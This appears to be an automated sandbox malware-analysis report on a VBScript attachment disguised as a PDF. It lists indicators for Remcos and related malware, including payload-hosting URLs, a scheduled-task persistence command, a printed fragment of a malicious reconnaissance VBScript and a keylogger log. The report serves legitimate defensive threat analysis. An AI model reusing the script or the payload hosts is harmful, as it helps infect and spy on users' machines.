Start date and time: 2024-12-09 16:33:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Aktarma,pdf.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@13/11@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 55
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 20.103.156.88, 199.232.210.172, 20.198.118.190, 2.16.158.90, 2.16.158.96, 2.16.158.184, 2.16.158.91, 2.16.158.171, 2.16.158.176, 2.16.158.169, 2.16.158.97, 2.16.158.170, 4.175.87.197, 20.234.120.54, 52.165.164.15, 2.16.158.192, 2.16.158.186, 2.16.158.179, 2.16.158.185, 2.16.158.187, 23.218.208.109, 20.109.210.53, 20.190.177.21, 13.107.246.63, 150.171.28.10
                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, otelrules.afd.azureedge.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com, wns.notify.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, fe3.delivery.mp.microsoft.com, mm-mm.b
• Not all processes were analyzed; the report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: Aktarma,pdf.vbs
Time | Type | Description
10:34:02 | API Interceptor | 75x Sleep call for process: powershell.exe modified
10:34:36 | API Interceptor | 2x Sleep call for process: svchost.exe modified
10:35:02 | API Interceptor | 847126x Sleep call for process: MSBuild.exe modified
16:34:28 | Task Scheduler | Run new task: Run; File path: wscript.exe s>C:\ProgramData\classers.vbs
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.187.200 | geHxbPNEMi.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/1QtpX
172.67.187.200 | MT103-8819006.DOCS.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/rYCH1
172.67.187.200 | LETA_pdf.vbs | Get hash | malicious | AsyncRAT, PureLog Stealer | Browse | paste.ee/d/0jfAN
172.67.187.200 | PO 2725724312_pdf.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/tiRif
172.67.187.200 | EWW.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/gFlKP
172.67.187.200 | ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx | Get hash | malicious | Unknown | Browse | paste.ee/d/JxxYu
172.67.187.200 | Purchase Order PO0193832.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/Bpplq
172.67.187.200 | Name.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/0kkOm
172.67.187.200 | 517209487.vbs | Get hash | malicious | XWorm | Browse | paste.ee/d/s0kJG
172.67.187.200 | screen_shots.vbs | Get hash | malicious | XWorm | Browse | paste.ee/d/GoCAw
45.80.158.30 | 173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | sws.swpushroller.eu/swsk/P4.php
45.80.158.30 | Doc261124.vbs | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | sws.swpushroller.eu/swsk/P4.php
151.101.1.137 | 16547.js | Get hash | malicious | MassLogger RAT | Browse
151.101.1.137 | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | Get hash | malicious | Remcos | Browse
151.101.1.137 | nr101612_Order.wsf | Get hash | malicious | Remcos | Browse
151.101.1.137 | 1013911.js | Get hash | malicious | FormBook | Browse
151.101.1.137 | http://itsecurityupdate.com | Get hash | malicious | Unknown | Browse
151.101.1.137 | https://www.payment.token2049.com/page/3156941?widget=true& | Get hash | malicious | Unknown | Browse
151.101.1.137 | https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174d | Get hash | malicious | Unknown | Browse
151.101.1.137 | https://www.postman.com/postman-account/ | Get hash | malicious | Unknown | Browse
151.101.1.137 | https://pitch.com/public/f3efe39e-ece6-4e9c-abe8-1a8052876a2f | Get hash | malicious | Unknown | Browse
                                                                                                                    http://url1578.fundawithjyoti.com/ls/click?upn=yFeSTx5DQPiItplIvZtCPdAv3GpeMYxjprPyDOCgTw1xm5EF-2BSU-2FZwHfXBSOkRTYIwSi_PM4alGcAZ86A1O3u51J4mEQLFGtubxWdVTg6-2FcJBO1jp9oyNXZ6mQSzeNX-2B7VKKHaPBntWFf6zrDi2LaKqtvUzASDJDri9snRnhQmfVJu93OvrNKf6Snskbo4Mar5fZfKgMrMZV4l2iAuDUHqpnBu4YaiZKY2P5OfELBNW9EfAa-2Bok0-2FIzO3PqWMlvgZ-2Fje-2FUU8UZBB1GxMGbjln9hLRizR8o-2Fr50XlWOzT0j9e1u4nN66dlXcpcm5W2p7cHgy5GE7mk2dn5NzOWuGvU2lGlr0NN3TD0cG7S4-2BjTresT7iZcn-2BAPBTa7I25wE9mA8TVmpfnjR4h9ZIBZWWJUW7TK929wF1RSkjooMmCtEk4K5GC1sj7iJpvWk-2BhZBRiN-2BsTXm3yWxaq8MVvX2pZ37cZLxGXME0rnnb84oAEnXw9piVOzqcTP8hhqQH4ZlHnyNDwBIS4Mav7-2BGywdgWfbuvCEFheFdZoHpKiKAPQnnBUuCY-2FKQjMYjvPsHNMtI4G4rjtmVkrXr9Aw3lrHejW-2FVq1tIkTK6WHtZyqprzbin6N1UrjzZ27Iu09egdWJUN6FoiB0yRpNYIvO0xs4ncpF6m7kT9F7zNhlO4-2Fn41yMLMfCywxEgIGAdzizC6vZalFQqzXfvLP5uQrdsFEvgXTZ1Uq23AFkvmhLmefr5OZh8f5SasfPLx08zJxZeINsv2YigPAW5TK7c9dAoOi32BKFv-2FP5qJIhzdOIWWRkPfDi1GZjxIDHkkUOQsdGXFwKX5GHPFk2DAsz2yAsUZxOKp40NHQm-2BOlBdtsFRs4dO9adR1QT-2F8OCf-2BLxBlXPYley6fhoPj850B2eVJ4DvMsA7QLr-2FX1aPQe8Eh9ozsOqOl-2FWqEH5zP49MOYRxvkitzx89YSOXTqM&c=E,1,-IYx59KsfzGYtK54bJA2fYABiNk3BZVZFDoiFUZPOnduDII2JTWNl4pt0tezpZxBRNlQtMTJXh0gayWDNghKvyhRHgt1ZkW4KYejOeeszJ5dYA,,&typo=1Get hashmaliciousUnknownBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
paste.ee | ithgreat.doc | Get hash | malicious | Unknown | Browse | 188.114.97.6
paste.ee | xxx.doc | Get hash | malicious | Unknown | Browse | 188.114.96.6
paste.ee | Potvrda_o_uplati.docx.doc | Get hash | malicious | Unknown | Browse | 188.114.97.6
paste.ee | NewOrder12052024.js | Get hash | malicious | Remcos | Browse | 172.67.187.200
paste.ee | fUHl7rElXU.xlsx | Get hash | malicious | Unknown | Browse | 188.114.97.6
paste.ee | Order_DEC2024.wsf | Get hash | malicious | Remcos | Browse | 104.21.84.67
paste.ee | nr101612_Order.wsf | Get hash | malicious | Remcos | Browse | 104.21.84.67
paste.ee | 1099833039444.pdf.js | Get hash | malicious | Remcos | Browse | 104.21.84.67
paste.ee | 1013911.js | Get hash | malicious | FormBook | Browse | 104.21.84.67
paste.ee | asegurar.vbs | Get hash | malicious | Unknown | Browse | 104.21.84.67
cloudinary.map.fastly.net | xxx.doc | Get hash | malicious | Unknown | Browse | 151.101.1.137
cloudinary.map.fastly.net | Potvrda_o_uplati.docx.doc | Get hash | malicious | Unknown | Browse | 151.101.193.137
cloudinary.map.fastly.net | atthings.doc | Get hash | malicious | Remcos | Browse | 151.101.65.137
cloudinary.map.fastly.net | 16547.js | Get hash | malicious | MassLogger RAT | Browse | 151.101.1.137
cloudinary.map.fastly.net | togiveme.doc | Get hash | malicious | Remcos | Browse | 151.101.129.137
cloudinary.map.fastly.net | greatnew.doc | Get hash | malicious | Remcos | Browse | 151.101.193.137
cloudinary.map.fastly.net | bestimylover.hta | Get hash | malicious | Cobalt Strike, FormBook, HTMLPhisher | Browse | 151.101.129.137
cloudinary.map.fastly.net | nicpeoplesideasgivenforme.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher | Browse | 151.101.129.137
cloudinary.map.fastly.net | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | Get hash | malicious | Remcos | Browse | 151.101.1.137
cloudinary.map.fastly.net | nr101612_Order.wsf | Get hash | malicious | Remcos | Browse | 151.101.1.137
bg.microsoft.map.fastly.net | tQoSuhQIdC.msi | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | W-2Updated.pdf | Get hash | malicious | KnowBe4, PDFPhish | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | BL COAU7249606620-pdf.exe | Get hash | malicious | FormBook | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcb | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | TeudA4phjN.exe | Get hash | malicious | Quasar | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | List of required items pdf.vbs | Get hash | malicious | GuLoader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | List of required items and services pdf.vbs | Get hash | malicious | GuLoader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | 8ehpti2jSS.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | Get hash | malicious | Stealc | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | f5ATZ1i5CU.exe | Get hash | malicious | RedLine, XWorm | Browse | 199.232.214.172
geoplugin.net | Ref#60031796.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | PEbZthAqV9.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
geoplugin.net | IB9876789000.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | scan_241205-801_draft_PO.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | NewOrder12052024.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | W6iQkG4jZ1.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | VERSION.dll.dll | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | LdSbZG1iH6.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.1.91
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.65.91
FASTLYUS | _.html | Get hash | malicious | Unknown | Browse | 151.101.66.137
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.193.91
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.129.91
FASTLYUS | https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com | Get hash | malicious | HTMLPhisher | Browse | 151.101.130.137
FASTLYUS | https://sendgb.com/vdRYC6Nal34?utm_medium=HlyZfLISdD8Bj1i | Get hash | malicious | Unknown | Browse | 151.101.65.229
FASTLYUS | https://reviewgustereports.com/ | Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse | 151.101.194.137
FASTLYUS | https://jdjdhjh.uscourtdocuments.com/A3RjQ | Get hash | malicious | HTMLPhisher | Browse | 151.101.194.137
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.65.91
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm | Browse | 104.21.16.9
CLOUDFLARENETUS | securedoc_20241209T071703.html | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.165.166
CLOUDFLARENETUS | http://www.cargoforce.co.uk/media/system/js/core.js?1399aaee86665a1dd2ea810af52638f9 | Get hash | malicious | Unknown | Browse | 1.1.1.1
CLOUDFLARENETUS | _.html | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | 1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
CLOUDFLARENETUS | W-2Updated.pdf | Get hash | malicious | KnowBe4, PDFPhish | Browse | 104.17.249.203
CLOUDFLARENETUS | 1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe | Get hash | malicious | Snake Keylogger | Browse
                                                                                                                      • 172.67.177.134
                                                                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      UK2NET-ASGBmain_m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 77.92.90.50
                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 88.202.185.180
                                                                                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 46.28.54.10
                                                                                                                      173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 45.80.158.30
                                                                                                                      Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 45.80.158.30
                                                                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 80.209.188.4
                                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.80.158.23
                                                                                                                      8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 173.244.199.148
                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 83.170.86.99
                                                                                                                      D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 77.92.65.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
6271f898ce5be7dd52b0fc260d0662b3
https://www.drvhub.net | malicious | Unknown
• 150.171.27.10
http://74.50.69.234/ | malicious | Unknown
• 150.171.27.10
TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT
• 150.171.27.10
TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown
• 150.171.27.10
TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown
• 150.171.27.10
TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT
• 150.171.27.10
Transferencia.lnk | malicious | XenoRAT
• 150.171.27.10
Software_Tool.exe | malicious | Unknown
• 150.171.27.10
file.exe | malicious | LummaC Stealer
• 150.171.27.10
https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D | malicious | HTMLPhisher
• 150.171.27.10
3b5074b1b5d032e5620f69f9f700ff0e
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm
• 172.67.187.200
• 151.101.1.137
jXN37dkptv.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.187.200
• 151.101.1.137
https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcb | malicious | Unknown
• 172.67.187.200
• 151.101.1.137
rrats.exe | malicious | AsyncRAT
• 172.67.187.200
• 151.101.1.137
https://app.droplet.io/form/yelEz0 | malicious | Unknown
• 172.67.187.200
• 151.101.1.137
TeudA4phjN.exe | malicious | Quasar
• 172.67.187.200
• 151.101.1.137
List of required items pdf.vbs | malicious | GuLoader
• 172.67.187.200
• 151.101.1.137
List of required items and services pdf.vbs | malicious | GuLoader
• 172.67.187.200
• 151.101.1.137
PYsje7DgYO.exe | malicious | RHADAMANTHYS
• 172.67.187.200
• 151.101.1.137
EcjH6Dq36Y.exe | malicious | RHADAMANTHYS
• 172.67.187.200
• 151.101.1.137
No context
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.7262998519470576
Encrypted:false
SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0r:9JZj5MiKNnNhoxui
MD5:8E5C62035AF434E1BC3505204CE6905F
SHA1:7907F9B765E25BC57253816D3B7CDF8AB8BA76ED
SHA-256:23E7234583F8493633F3773C983BA3D755671247A14626DD270B3233A292B023
SHA-512:7F035976C25C0839C1BE2F6095EC7A269CF67F3FCF6AFDE8B55B45C970974405DEE3F758D55499B53CB358A90F1853AB6CF0C8DE36946BE4F2D5ACC9E02ECCAD
Malicious:false
                                                                                                                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage user DataBase, version 0x620, checksum 0x71f4ec36, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.755566569632113
Encrypted:false
SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
MD5:82EEF7F438C900B40157FF30A4E42F09
SHA1:F5949C5BC6B3FB8BEC69410FB7AA7832487DEDD7
SHA-256:DEF40ADD33757F4B070BDFA6DEDDAEA469542825914BC450F19EB7034688C4AE
SHA-512:2510D1AC4A7D5095327177C1D9C73BD4CD66DFC08B77D7876B0408E88BE23F790BCAFD4F6DA7D2CA95E987B5D9CE072B69087B370E8C014D2EB17216A5077662
Malicious:false
                                                                                                                      Preview:q..6... .......7.......X\...;...{......................0.e......!...{?.%"...|9.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................Q.$.%"...|9.....................%"...|9..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07878150755040941
Encrypted:false
SSDEEP:3:PUYe3nUag3NaAPaU1lgpAUtlAlluxmO+l/SNxOf:8z3XANDPaUiAgmOH
MD5:5BA4CC144D428D2D585622F4E806DCB4
SHA1:3359E5603D653A9626442B5712719DCE690965A4
SHA-256:104E7149B3BD3DD46F5A753D88517BA20F3F4D9FC5D038A9E6843BFC44D13C19
SHA-512:2CC5D271CD60F8866B46A9A0F923C431499A68ACD8EE15DF2DF116A9670FF55EBDD792EDF4D7AD5DEBB5B850B30C85DCF03813AD24E39AC23FAF8D42E3230638
Malicious:false
                                                                                                                      Preview:ps......................................;...{..%"...|9..!...{?..........!...{?..!...{?..g...!...{?.....................%"...|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):437480
Entropy (8bit):5.105403560005336
Encrypted:false
SSDEEP:6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
MD5:42320E659E8E1885EB96342E52E4EC60
SHA1:8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
SHA-256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
SHA-512:CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
Malicious:true
                                                                                                                      Preview:Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:data
Category:dropped
Size (bytes):194
Entropy (8bit):3.4671477228840897
Encrypted:false
SSDEEP:3:rhlKlyKvlPNylfUClDl5JWRal2Jl+7R0DAlBG4nLbl+SliFl2cNC3QKhklovDl6v:6lZvdN28Cl55YcIeeDAlbl+Skec/3WAv
MD5:1C5D4F402F4C8E9F805CD1CC74C07466
SHA1:4882E51ABA55AF1D0152EF5A239DBF8FB7DE65F6
SHA-256:7A2096E370204B7A54D8E11D819F1B5047D884DBC50134B12D3D419E46B218BB
SHA-512:940AF3FC053536ACC5939F7942579E2A819149F17F62B30F03BD7B600861EEBD4056F9534D3A246AC5F951B3B898FA082A468313A465D1ECFFDA3CAE311D69EE
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                      Preview:....[.2.0.2.4./.1.2./.0.9. .1.0.:.3.4.:.3.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:JSON data
Category:dropped
Size (bytes):963
Entropy (8bit):5.01340392779544
Encrypted:false
SSDEEP:12:tkluJnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluNdVauKyGX85jvXhNlT3/7CcVKWro
MD5:730B9E7B64A360231F44C5A6E39E21BF
SHA1:7C483F890F56C5BD9D713F8A8B4B46435D8E401E
SHA-256:BB291DD8CF522B4EF3E8FEB102DA5376B9F6A01E613325C365EF3ABFAF97D277
SHA-512:8A547C075E4643F6D4AF25776DF010E1D537F014511E6D69605BD5B8074D547DFBBFC902AEE5F4DB9FA382BD0700D9859477B0A4B88CA1E275A6BF919C11CC90
Malicious:false
                                                                                                                      Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9434
                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                      Malicious:false
                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64
                                                                                                                      Entropy (8bit):1.1628158735648508
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Nllluldhz/lL:NllU
                                                                                                                      MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                                                      SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                                                      SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
